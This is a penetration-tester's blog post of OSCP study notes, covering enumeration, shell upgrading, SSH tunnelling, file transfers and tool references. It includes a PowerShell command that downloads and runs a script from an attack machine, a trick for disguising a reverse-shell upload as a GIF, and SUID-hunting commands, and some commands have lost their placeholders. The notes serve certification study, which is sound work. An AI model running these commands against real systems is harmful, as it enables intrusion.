Tips and Tricks

Oct 3, 2020 tools tips tricks
Share on:

OSCP Notes

Best Practices

  1. Always put an /etc/hosts entry for the servers you are working on, especially with the webapps so that you can explore vhosts.

  2. Its a good practice to search for all files under - find /home -type f -printf "%f\t%p\t%u\t%g\t%m" , followed by suid binary search - find / -perm -4000 2>/dev/null OR find suid/sgid files on whole system using - find / -type f -a \(-perm -u+s -o -perm -g+s\) -exec -ls -l {} \; 2>/dev/null

  3. Read banner information, readme as you can sometimes gather additional information that tools may have missed. Also read the SSL certificate information to know more about any other domains/subdomains the certificate applies, or for the registrant information/email etc.

  4. Before doing brute forcing accounts for SSH/FTP etc, try to read the authentication policies to prevent lockouts or IP bans etc

  5. Updated wordlists are better - /usr/share/seclists

Reverse Shells

  1. ippsec’s tiny shell command. < , Now, you can pass a command to the variable “ipp” to run on the target or to even get the reverse shell.
  2. Collection of bind and reverse shells to get PTY - https://github.com/infodox/python-pty-shells

Cool tips

How to improve to a better shell with hotkeys

When you already have a shell via - python -c ‘import pty; pty.spawn("/bin/bash");’ but the shell lack support for hot keys, vi etc. following steps will help improve your shell experience -

  1. Send current shell to background using CTRL + Z
  2. type - stty raw -echo and hit ENTER twice
  3. fg to foreground your shell
  4. Now, you should have a better shell!

SSH tips and Tricks

  1. Local Port forwarding: ssh -R :127.0.0.1: @
  2. Remote port forwarding: ssh -fNL :localhost: @
  3. Use of jump host ssh -J username@jumphost :localhost: @
  4. You will have weird issues if your file permissions on id_rsa*, authorized_keys files are too open. Also, try to stage these files on regular filesystem instead of /tmp.

File transfers

  1. On Windows - 1. powershell "IEX(New-Object Net.WebClient).downloadString('http://attack-machine-ip:<port>/filename.ext') 2. On attack machine(kali), start SMB using impacket-smbserver pwd ``` , then on the target machine \<share><filename>. This could be useful when doing lateral movements in lab.

  2. If you are facing issues with quotes/spaces/special characters when transferring files to windows machines, use icov to convert the file to windows file format and use base64 encoding. echo “hello world” | iconv -t UTF-16LE|base64 -w0 | xclip -selection primary

Compiling Code

  1. When compiling with gcc, you may need to pass -fPIC option to compile on 64 bit machines.

Tools and online references

  1. Python unicorn ( https://github.com/trustedsec/unicorn)
  2. PEDA
  3. To use GPU version of John to crack faster if you have GPU equipped machine or a crackbox -
    1. Jumbo John - https://github.com/openwall/john
    2. This version of john requires following - https://github.com/stricture/hashstack-server-plugin-jtr/blob/master/scrapers/sshng2john.py
  4. ASCII table key reference - http://www.asciitable.com
  5. Cipher Tools : http://www.rumkin.com/tools
  6. exiftool for analyzing images, logos
  7. Droopescan for scanning Drupal websites
  8. PowerUp.ps1 Script to automate lot of stuff (Empire)
  9. Dirsearch Python (Alternative to dirbuster and gobuster)
  10. Firefox Addons 1. FoxyProxy 2. Quick Cookie Manager or Cookie Manager
  11. Padbuster
  12. Microsoft sysinternals toolkit - https://docs.microsoft.com/en-us/sysinternals/downloads/pstools

Reading/Common Blindspots

  1. Familiarize yourself with popular exploits such as dirtycow, eternalblue etc
  2. Buffer Overflow:
    1. ASLR/DEP context
    2. gdb
    3. peda
  3. Google: PHP Filter LFI
  4. DNS zone transfer and enumeration
  5. When using local exploit suggester modules/scripts, make sure to run against the same processor architecture (32/64 bit)
  6. Making a quick GIF file for a reverse shell is much easier, just add GIF8 at the top of the file. For other file types,to add the magic bytes, you need to use hexeditor to update the headers.

Python Proficiency

  1. Hex and Ascii conversion
  2. File read/write operations
  3. Modules: Requests, Sockets